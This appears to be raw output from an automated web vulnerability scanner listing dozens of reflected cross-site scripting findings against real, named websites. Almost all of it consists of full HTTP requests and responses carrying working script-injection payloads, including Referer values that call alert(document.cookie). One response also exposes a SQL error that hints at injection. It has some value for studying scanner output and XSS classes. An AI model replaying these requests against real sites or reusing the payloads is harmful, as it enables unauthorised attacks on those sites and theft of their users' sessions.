User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56cc7"><script>alert(1)</script>6a526b333db was submitted in the REST URL parameter 2. This input was echoed as 56cc7\"><script>alert(1)</script>6a526b333db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins56cc7"><script>alert(1)</script>6a526b333db/oiopub-direct/modules/tracker/tracker.php?pids=0|8 HTTP/1.1
Host: www.digitalbond.com
Proxy-Connection: keep-alive
Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2c6e"><script>alert(1)</script>2bc8a2eddd7 was submitted in the REST URL parameter 3. This input was echoed as f2c6e\"><script>alert(1)</script>2bc8a2eddd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/oiopub-directf2c6e"><script>alert(1)</script>2bc8a2eddd7/modules/tracker/tracker.php?pids=0|8 HTTP/1.1
Host: www.digitalbond.com
Proxy-Connection: keep-alive
Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c8c"><script>alert(1)</script>4a58cf6c2e9 was submitted in the REST URL parameter 4. This input was echoed as 99c8c\"><script>alert(1)</script>4a58cf6c2e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/oiopub-direct/modules99c8c"><script>alert(1)</script>4a58cf6c2e9/tracker/tracker.php?pids=0|8 HTTP/1.1
Host: www.digitalbond.com
Proxy-Connection: keep-alive
Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6ba5"><script>alert(1)</script>5b5a6145b4a was submitted in the REST URL parameter 5. This input was echoed as a6ba5\"><script>alert(1)</script>5b5a6145b4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/oiopub-direct/modules/trackera6ba5"><script>alert(1)</script>5b5a6145b4a/tracker.php?pids=0|8 HTTP/1.1
Host: www.digitalbond.com
Proxy-Connection: keep-alive
Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6255"><script>alert(1)</script>471cc409191 was submitted in the REST URL parameter 6. This input was echoed as e6255\"><script>alert(1)</script>471cc409191 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/oiopub-direct/modules/tracker/tracker.phpe6255"><script>alert(1)</script>471cc409191?pids=0|8 HTTP/1.1
Host: www.digitalbond.com
Proxy-Connection: keep-alive
Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af64a"><script>alert(1)</script>a0e25d7d8ae was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea01"><script>alert(1)</script>c5404c339c7 was submitted in the password parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e687"><script>alert(1)</script>67e9ee1a59a was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the city request parameter is copied into the HTML document as plain text between tags. The payload eb7a1<script>alert(1)</script>1db7d40c8bd was submitted in the city parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /updateCity.html?city=Albuquerqueeb7a1<script>alert(1)</script>1db7d40c8bd HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) X-Requested-With: XMLHttpRequest Accept: */* Cache-Control: no-cache Host: www.insideup.com Cookie: JSESSIONID=6BEF346987D68A3E238C3C14837EFF90 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 02:15:36 GMT Server: Apache/2.2.9 (Fedora) Content-Length: 58 Connection: close Content-Type: text/html; charset=UTF-8
The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eac1"><script>alert(1)</script>bf0484e3881 was submitted in the action parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8809</script><script>alert(1)</script>18e974c6791 was submitted in the action parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1deb9<script>alert(1)</script>a999c03644a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico1deb9<script>alert(1)</script>a999c03644a HTTP/1.1 Host: www.jotform.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: nginx/0.6.32 Date: Tue, 19 Apr 2011 20:01:53 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Powered-By: PHP/5.2.6-1+lenny9 Status: 404 Not Found Vary: Accept-Encoding Content-Length: 251
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL "favicon.ico1deb9<script>alert(1)</script>a999c03644a" was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3eb97<script>alert(1)</script>b8575cf51d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /form3eb97<script>alert(1)</script>b8575cf51d4/2910946098 HTTP/1.1 Host: www.jotform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.6.32 Date: Tue, 19 Apr 2011 19:47:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.2.6-1+lenny9 Status: 404 Not Found Vary: Accept-Encoding Content-Length: 255
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL "form3eb97<script>alert(1)</script>b8575cf51d4/2910946098" was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c7d"><a>500034c1e00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /investisseurs/actualites-boursieres/0201292688069-soupcons-d-espionnage-chez-safran.htmf3c7d"><a>500034c1e00 HTTP/1.1 Host: www.lesechos.fr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the lhnid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8c52a%3balert(1)//90d60205d5c was submitted in the lhnid parameter. This input was echoed as 8c52a;alert(1)//90d60205d5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=12888c52a%3balert(1)//90d60205d5c&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E921665f2e0e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack='f'; if (typeof lhnInstalled !='undefined'){lhnTrack='f'} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepeats=0;
The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60bf4"%3balert(1)//82a7cbbe680 was submitted in the lhnid parameter. This input was echoed as 60bf4";alert(1)//82a7cbbe680 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=128860bf4"%3balert(1)//82a7cbbe680&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E921665f2e0e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack='f'; if (typeof lhnInstalled !='undefined'){lhnTrack='f'} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepeats=0;
function pa ...[SNIP]... <img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=173.193.214.243|128860bf4";alert(1)//82a7cbbe680|4/19/2011 4:12:32 PM' /> ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23e8b'%3balert(1)//cf95cc40312 was submitted in the t parameter. This input was echoed as 23e8b';alert(1)//cf95cc40312 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f23e8b'%3balert(1)//cf95cc40312 HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E921665f2e0e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack='f23e8b';alert(1)//cf95cc40312'; if (typeof lhnInstalled !='undefined'){lhnTrack='f'} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=-1; InviteRepeats=0;
The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8f07c%3balert(1)//96a0de8e20 was submitted in the zimg parameter. This input was echoed as 8f07c;alert(1)//96a0de8e20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=598f07c%3balert(1)//96a0de8e20&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E921665f2e0e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack='f'; if (typeof lhnInstalled !='undefined'){lhnTrack='f'} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=-1; InviteRepeats=0;
The value of the AttorneyID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b151a"><script>alert(1)</script>bae38c8c76f was submitted in the AttorneyID parameter. This input was echoed as b151a\"><script>alert(1)</script>bae38c8c76f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /attorneys.php?AttorneyID=79b151a"><script>alert(1)</script>bae38c8c76f HTTP/1.1 Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com/attorneys.php?letter=K User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on ...[SNIP]... <a href="vcard.php?AttorneyID=79b151a\"><script>alert(1)</script>bae38c8c76f" title="V-Card" id="vCard"> ...[SNIP]...
The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 9abcc<a>6b16b1680ee was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careers.php?CategoryID=239abcc<a>6b16b1680ee HTTP/1.1 Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com/careers.php User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
error: Unknown column '239abcc' in 'where clause' | 1054<BR>sql: SELECT CategoryName FROM _categories WHERE CategoryID=239abcc<a>6b16b1680ee <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> ...[SNIP]...
3.175. http://www.southparkstudios.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.southparkstudios.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e731a"><script>alert(1)</script>9dbbd360ab1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e731a"><script>alert(1)</script>9dbbd360ab1=1 HTTP/1.1 Host: www.southparkstudios.com Proxy-Connection: keep-alive Referer: http://www.southparkstudios.com/clips15540%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef37e55f8e40/360434/god-bless-you-captain-hindsight User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66255"><script>alert(1)</script>8d642b71193 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 582b6"><script>alert(1)</script>0bf5c8d2bb0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 480f0"><script>alert(1)</script>6f8e9ffc984 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb000"><script>alert(1)</script>49a8f150b11 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.180. http://www.southparkstudios.com/account/login [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.southparkstudios.com
Path: /account/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc6b"><script>alert(1)</script>4d6c7d9ba48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15540"><script>alert(1)</script>f37e55f8e40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /clips15540"><script>alert(1)</script>f37e55f8e40/360434/god-bless-you-captain-hindsight HTTP/1.1 Host: www.southparkstudios.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22f9a"><script>alert(1)</script>3282301e834 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /clips/36043422f9a"><script>alert(1)</script>3282301e834/god-bless-you-captain-hindsight HTTP/1.1 Host: www.southparkstudios.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a395"><script>alert(1)</script>b55c0389c3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico9a395"><script>alert(1)</script>b55c0389c3b HTTP/1.1 Host: www.southparkstudios.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ak-mobile-detected=no; mbox=check#true#1303242692|session#1303242631302-17636#1303244492; s_nr=1303242631335; s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48885"><script>alert(1)</script>6c94495e35f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 900ab"><script>alert(1)</script>cbc1985aaa2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b73f"><script>alert(1)</script>5e9dd41d598 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92585"><script>alert(1)</script>16db96cd4bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4dd0"><script>alert(1)</script>820d596d17d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dded6"><script>alert(1)</script>df8005b0ae8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d752"><script>alert(1)</script>909260ee294 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.191. http://www.southparkstudios.com/guide/episodes/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.southparkstudios.com
Path: /guide/episodes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c825"><script>alert(1)</script>744c18b4672 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17f7a"><script>alert(1)</script>3286600b94e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 519b1"-alert(1)-"9a5bdb36e23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=519b1"-alert(1)-"9a5bdb36e23 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d42d"><script>alert(1)</script>0af933f87e2f07608 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcec4"><script>alert(1)</script>765084d5be8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
